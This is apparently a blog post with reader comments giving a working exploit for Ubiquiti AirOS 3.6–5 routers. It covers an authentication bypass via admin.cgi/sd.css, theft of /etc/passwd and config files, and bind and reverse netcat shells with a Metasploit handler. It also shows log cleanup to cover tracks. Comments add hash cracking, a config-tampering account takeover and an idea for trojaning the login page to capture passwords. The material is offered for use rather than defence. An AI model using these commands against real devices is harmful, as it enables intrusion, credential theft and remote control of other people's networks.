[exploit] AirOS 5

Vulnerable: Ubiquiti Networks, Inc. AirOS 5
Ubiquiti Networks, Inc. AirOS 4.0
Ubiquiti Networks, Inc. AirOS 3.6.1

Default:
IP: 192.168.1.20
Username: ubnt
Password: ubnt
first off:
http://www.securityfocus.com/bid/51178/exploit

go to
http://<site>/admin.cgi/sd.css

here’s a menu for up/downloading,etc 🙂
download /etc/passwd and voilá
(or command execute: cat /etc/passwd)

you can download
/etc/passwd
lib/settings.inc
/tmp/system.cfg
/usr/etc/system.cfg

Command lines:
wlanconfig ath0 list scan
iwconfig
ifconfig
netstat -a
uname -a
ps -A
ls -a
or try:
cat /etc/passwd
discover
status-full.cgi
id
env

shells:
/bin/sh
/bin/ash
/bin/clish

————————————
let’s create a shell with Metasploit
————————————
Cmd to execute at sd.css:
nc -l -p 4444 -e /bin/sh -i

-open metasploit

sudo ./msfconsole
> use multi/handler
exploit(handler) > set payload cmd/unix/bind_netcat
exploit(handler) > set rhost <target>
exploit(handler) > exploit
Started bind handler
Starting the payload handler…
Command shell session 10 opened (10.0.0.2:59681 -> xxx.xxx.xxx.xx:4444) at 2012-01-04 07:48:50 +0100
so, there’s your shell
(don’t forget to open your port 4444 if behind a router.)

or use nc ofcourse
nc <ip> 4444

at the same page after you’re done playing around

execute command:
rm /tmp/.sessions.tdb
I noticed Netcat on AirOS doesn’t support -e
workaround:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ISP-IP 4444 >/tmp/f

–enjoy

55 thoughts on “[exploit] AirOS 5

  1. Hi, i know password which is encrypted in sytem.cgi, but user is disabled, how can u enable him ? or any other way how to create a new user with password a login using this acc. ?

  2. Pingback: Vulnerability AirOS

    • I tried some basics, but couldn’t find it.
      You can try it yourself with John The Ripper (if you have linux — install backtrack5)

      ./john –format=des –wordlist= –rules

      my wordlist (a small one) didn’t gave any results,
      and I really don’t have the time now to bruteforce it without dictionary. If you google you can find some sites which you can post this and ask(request) for a collision-hash.

  3. Here I let a trick, follow this STEPS carefully:

    1) Use /tmp/system.cfg download the file
    2) Open system.cfg and open with wordpad or notepad then go where it says:
    users.1.name=ZZZZZZZ
    users.1.password=XXXXXXXX
    users.1.status=enabled

    change the user to: ubnt, and password to : VvpvCwhccFv6Q
    now save
    4) Go TO http://x.x.x.x/reset.cgi/sd.css (this will reset the router)
    5) now connect to IP : 192.168.1.20 login user & pass should be ubnt
    6)GO to ” system ” then configuration management and upload your modified file
    7)now you got all your configuration with ubnt user&pass
    8)enjoy ( WARRANTY MOST OF THE ISP USE FALLBACK IP 192.168.1.20 FOR ALL USERS SO YOU WILL BE UNABLE TO LOGIN ( 5 STEP)). I RECOMMEND TO YOU SCAN 192.168.1.XXX.

  4. cant do all of that, when opening http:///admin.cgi/sd.css :

    Error 403 – Forbidden
    You have attempted to access the page, which is forbidden for your account
    In a few seconds you will be redirected to the main page. If you are not redirected, then please click the following link: Main

    What is the story with it??

  5. Hi there,
    Is there a way to overwrite login.cgi using this administration utility(sd.css) and upload a modified one that also logs the password at long in to a text file? Then read the file using cat command ?
    Thanks!

  6. neusbeer – i try use HashCat, butt I can not understand what do I hash type use?? and what parameters to configure hashcat.
    I try hashtype Gui Win32.
    TNX

  7. Can someone decrypt this password for me ?? my the guy tath installed my AirGrid m5 changed the ubnt/ubnt login to Admin and the password code is

    WwdyOxbH4wBR2
    can someone decrypt it or give me a site or anything ?

Leave a Reply

Your email address will not be published. Required fields are marked *